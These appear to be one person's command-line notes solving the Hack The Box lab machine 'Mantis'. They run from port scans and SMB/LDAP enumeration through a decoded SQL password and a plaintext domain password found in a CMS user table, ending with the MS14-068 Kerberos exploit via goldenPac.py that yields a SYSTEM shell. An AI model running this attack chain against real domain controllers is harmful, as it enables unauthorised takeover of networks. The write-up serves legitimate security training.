Mantis

nmap scan

└─$ nmap -sV -sC -oA mantis 10.10.10.52 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 22:55 EDT
Nmap scan report for 10.10.10.52
Host is up (0.34s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-18 02:56:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open @�EfV Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2023-09-18T02:57:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-18T02:43:16
|_Not valid after: 2053-09-18T02:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Tossed Salad – Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|clock-skew: mean: 48m00s, deviation: 1h47m21s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|
System time: 2023-09-17T22:57:31-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-18T02:57:32
|_ start_date: 2023-09-18T02:43:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.80 seconds

adding the domain to the hosts file

  GNU nano 7.2                                                                                                      /etc/hosts                                                                                                                
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local
10.10.10.52     htb.local  mantis.htb.local

ldapsearch

naming context

                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ ldapsearch -x -H ldap://10.10.10.52 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

searching for valid usernames. no luck

APv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ 

smbclient but no luck

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbclient -L //10.10.10.52 -N -U%                     

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ smbmap -H 10.10.10.52

Try rpcclient with two options

rpcclient -U '' 10.10.10.52 -   blank usersanem
--

rpcclient -U '' -N 10.10.10.52 --> with blank username but do not ask for password
└─$ rpcclient -U '' 10.10.10.52
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ rpcclient -U '' -N 10.10.10.52
rpcclient



gt;


will try sone rpcclient commands - no permissions

result was NT_STATUS_ACCESS_DENIED
rpcclient



gt; querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient


gt; enumdomgroups
result was NT_STATUS_ACCESS_DENIED


GetNPusers

└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'htb.local/'       
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -x -H ldap://10.10.10.52 -b 'DC=htb,DC=local' -s sub                                                  
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

passoword policy

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.52 --pass-pol
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
                                                                                                                     
┌──(kali㉿kali)-[~]

tried sqlclient

└─$ ./mssqlclient.py [email protected] -windows-auth

Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
                                                                                        
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

Tried enumerating 10.10.10.52:8080 with go buster but did not get anything after i tried each end point

gobuster dir -u http://10.10.10.52:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

out of the rabit hole

Tried to do a full nmap scan but it kept failing before completion

nmap -p- -T4 -oA full 10.10.10.52 -Pn

Got a hint that port 1337 is open so just did a direct scan to the port

'┌──(kali㉿kali)-[~/HTB/mantis]
└─$ nmap -p 1337 10.10.10.52              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 18:09 EDT
Nmap scan report for htb.local (10.10.10.52)
Host is up (0.34s latency).

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds'

we can open a web page with - http://10.10.10.52:1337/

Enumerating this with gobuster

gobuster dir -u http://10.10.10.52:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

i also ran the same with ffuf to see if it gets anything faster

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ

FFUF is definately much faster and gave me a result much quicker. WIll be using it

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/FUZZ


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.52:1337/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 339ms]
    * FUZZ: # Copyright 2007 James Fisher

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # or send a letter to Creative Commons, 171 Second Street, 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # on atleast 2 different hosts

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: # This work is licensed under the Creative Commons 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 341ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/ 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 344ms]
    * FUZZ: # Priority ordered case sensative list, where entries were found 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this 

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 345ms]
    * FUZZ: # Suite 300, San Francisco, California, 94105, USA.

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: # directory-list-2.3-medium.txt

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 346ms]
    * FUZZ: #

[Status: 500, Size: 3026, Words: 683, Lines: 73, Duration: 617ms]
    * FUZZ: orchard

[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 340ms]
    * FUZZ: 

[Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 347ms]
    * FUZZ: secure_notes

found this file

http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

from chatGPT

The string "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" appears to be encoded in Base64 format. Base64 is a group of binary-to-text encoding schemes that represent binary data in an ASCII string format. To determine its original content, you would need to decode it from Base64.

decoding it and then converting the hex to asci

└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -p
m$ql_S@_P@ssW0rd!                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ 

we are going to try and connect to the sql database with the admin credentials using mssqclient.py

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./mssqlclient.py admin:'m$ql_S@_P@ssW0rd!'@10.10.10.52

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL (admin  admin@master)>

some commands to interact with the sql

To list all databases  - SELECT name FROM sys.databases;

To switch to a specific database (replace `YourDatabaseName` with the actual database name):   USE YourDatabaseName;

Once you're inside a specific database, to list all tables:   SELECT name FROM sys.tables;

To see the columns of a specific table (replace `YourTableName` with the actual table name):
	SELECT column_name, data_type, character_maximum_length 
    FROM information_schema.columns 
    WHERE table_name = 'YourTableName';

Looking for usernames

SQL (admin  admin@master)> USE master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
SQL (admin  admin@master)> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S');
name    type_desc   
-----   ---------   
sa      SQL_LOGIN   

admin   SQL_LOGIN   


recommendation from chatGPT

**User and Role Information**:

- `blog_Orchard_Users_UserPartRecord`: This might contain user-specific information.

To fetch all columns from this table

SELECT * FROM blog_Orchard_Users_UserPartRecord;

[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'WHERE'.
SQL (admin  admin@orcharddb)> SELECT * FROM blog_Orchard_Users_UserPartRecord;
Id   UserName   Email             NormalizedUserName   Password                                                               PasswordFormat   HashAlgorithm   PasswordSalt               RegistrationStatus   EmailStatus   EmailChallengeToken   CreatedUtc            LastLoginUtc          LastLogoutUtc         
--   --------   ---------------   ------------------   --------------------------------------------------------------------   --------------   -------------   ------------------------   ------------------   -----------   -------------------   -------------------   -------------------   -------------------   
 2   admin                        admin                AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==   Hashed           PBKDF2          UBwWF1CQCsaGc/P7jIR/kg==   Approved             Approved      NULL                  2017-09-01 13:44:01   2017-09-01 14:03:50   2017-09-01 14:06:31   

15   James      [email protected]   james                J@m3s_P@ssW0rd!                                                        Plaintext        Plaintext       NA                         Approved             Approved      NULL                  2017-09-01 13:45:44   NULL                  NULL                  

SQL (admin  admin@orcharddb)> 

we can see a user [email protected] and password J@m3s_P@ssW0rd!

Trying crackmapexec with this

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec smb 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!' --shares
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
SMB         10.10.10.52     445    MANTIS           [+] Enumerated shares
SMB         10.10.10.52     445    MANTIS           Share           Permissions     Remark
SMB         10.10.10.52     445    MANTIS           -----           -----------     ------
SMB         10.10.10.52     445    MANTIS           ADMIN$                          Remote Admin
SMB         10.10.10.52     445    MANTIS           C$                              Default share
SMB         10.10.10.52     445    MANTIS           IPC$                            Remote IPC
SMB         10.10.10.52     445    MANTIS           NETLOGON        READ            Logon server share 
SMB         10.10.10.52     445    MANTIS           SYSVOL          READ            Logon server share 
                                                                                                          

trying winrm but this fails

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ crackmapexec winrm 10.10.10.52 -u 'james' -p 'J@m3s_P@ssW0rd!'     

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ evil-winrm -i  10.10.10.52 -u ryan -p 'J@m3s_P@ssW0rd!'     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985)
                                        
Error: Exiting with code 1
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/mantis]

                                                                    

trying rpcclient

Password for [WORKGROUP\james]:
rpcclient



gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient


gt; querydispinfo
index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xea6 RID: 0x44f acb: 0x00000210 Account: james Name: James Desc: (null)
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
rpcclient


gt; enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]
rpcclient


gt; queryuser james
User Name : james
Full Name : James
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 24 Dec 2017 09:39:48 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Thu, 31 Aug 2017 20:12:02 EDT
Password can change Time : Fri, 01 Sep 2017 20:12:02 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x44f
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff


getting RID for james


james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)                                                           
rpcclient



gt;

 
checking netlogon and sysvol. There was nothing in netlogon

─$ smbclient \\10.10.10.52\SYSVOL -U james%J@m3s_P@ssW0rd!

Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Aug 31 20:05:10 2017
.. D 0 Thu Aug 31 20:05:10 2017
htb.local Dr 0 Thu Aug 31 20:05:10 2017

            5217023 blocks of size 4096. 938803 blocks available

smb: > cd htb.local
smb: \htb.local> ls
. D 0 Thu Aug 31 20:06:29 2017
.. D 0 Thu Aug 31 20:06:29 2017
DfsrPrivate DHSr 0 Thu Aug 31 20:06:29 2017
Policies D 0 Thu Aug 31 20:05:19 2017
scripts D 0 Thu Aug 31 20:05:10 2017

            5217023 blocks of size 4096. 938803 blocks available

smb: \htb.local> cd scripts
smb: \htb.local\scripts> ls
. D 0 Thu Aug 31 20:05:10 2017
.. D 0 Thu Aug 31 20:05:10 2017

            5217023 blocks of size 4096. 938803 blocks available

smb: \htb.local\scripts> cd ../
smb: \htb.local> cd DfsrPrivate
cd \htb.local\DfsrPrivate: NT_STATUS_ACCESS_DENIED
smb: \htb.local> cd Policies
smb: \htb.local\Policies> ls
. D 0 Thu Aug 31 20:05:19 2017
.. D 0 Thu Aug 31 20:05:19 2017
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Thu Aug 31 20:05:19 2017
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Thu Aug 31 20:05:19 2017


downloaded the registry.pol file localy

```bash
└─$ smbclient \\\\10.10.10.52\\SYSVOL -U james%J@m3s_P@ssW0rd!

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017
  htb.local                          Dr        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \> cd htb.local
smb: \htb.local\> ls
  .                                   D        0  Thu Aug 31 20:06:29 2017
  ..                                  D        0  Thu Aug 31 20:06:29 2017
  DfsrPrivate                      DHSr        0  Thu Aug 31 20:06:29 2017
  Policies                            D        0  Thu Aug 31 20:05:19 2017
  scripts                             D        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\> cd scripts
smb: \htb.local\scripts\> ls
  .                                   D        0  Thu Aug 31 20:05:10 2017
  ..                                  D        0  Thu Aug 31 20:05:10 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\scripts\> cd ../\
smb: \htb.local\> cd DfsrPrivate
cd \htb.local\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \htb.local\> cd Policies
smb: \htb.local\Policies\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Thu Aug 31 20:05:19 2017
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Thu Aug 31 20:05:19 2017

                5217023 blocks of size 4096. 938803 blocks available
smb: \htb.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
  GPT.INI                             A       22  Thu Aug 31 20:08:27 2017
  MACHINE                             D        0  Thu Aug 31 20:08:27 2017
  USER                                D        0  Thu Aug 31 20:05:19 2017
cd 
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
cd 
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd MACHINE
cd \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\MACHINE\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
  .                                   D        0  Thu Aug 31 20:05:19 2017
  ..                                  D        0  Thu Aug 31 20:05:19 2017
cd 
                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Thu Aug 31 20:08:27 2017
  ..                                  D        0  Thu Aug 31 20:08:27 2017
  Microsoft                           D        0  Thu Aug 31 20:05:19 2017
  Registry.pol                        A     2782  Thu Aug 31 20:08:27 2017

                5217023 blocks of size 4096. 939173 blocks available
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol
getting file \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2782 as Registry.pol (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \htb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> 

Usin polenum to analyse. Gave up. rabbit hole. looked for hints

The RID that we got before will be useful

the machine is vulnerable to ms14-068

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

usage

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>


┌──(kali㉿kali)-[~/Downloads]
└─$ wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
--2023-09-22 08:51:17--  https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46695 (46K) [text/plain]
Saving to: ‘ms14-068.py’

ms14-068.py                    100%[=================================================>]  45.60K  --.-KB/s    in 0.08s   

2023-09-22 08:51:18 (552 KB/s) - ‘ms14-068.py’ saved [46695/46695]

                                                                                                                         
┌──(kali㉿kali)-[~/Downloads]
└─$ cp ms14-068.py ~/HTB/mantis                                   
                                                                                                                         
┌──(kali㉿kali)-[~/Downloads]

the user id we got from above in previous step using rpcclient

rpcclient



gt;lookupnames james

james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient


gt;

we run this script which kept failing numerous times and i beleive because i am using python 3 and its meant for 2. even when i tried 2.7 it kept failing.will try this later with kali2018

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2.7  ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache
                                                                                                                         
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python  ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103   
  File "/home/kali/HTB/mantis/ms14-068.py", line 149
    print 'ERROR:', e
    ^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
                                                                                                                         
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2  ms14-068.py -u [email protected] -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache
                                                                                                                         
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ 

tried goldenPac.py

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./goldenPac.py htb.local/james:J@m3s_P@ssW0rd\[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file gHZVxsPx.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service VAjq on mantis.htb.local.....
[*] Starting service VAjq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>^[[A^[[A

\>cd users
 
C:\Users>cd admi
b'The system cannot find the path specified.\r\n'
C:\Users>cd administrator
 
C:\Users\Administrator>cd desktop
 
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 3292-4936

 Directory of C:\Users\Administrator\Desktop

02/08/2021  01:44 PM    <DIR>          .
02/08/2021  01:44 PM    <DIR>          ..
09/22/2023  09:36 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,841,724,416 bytes free

C:\Users\Administrator\Desktop>type root.txt
ccada3f6a7bfe7c33068a653a56c51de

C:\Users\Administrator\Desktop>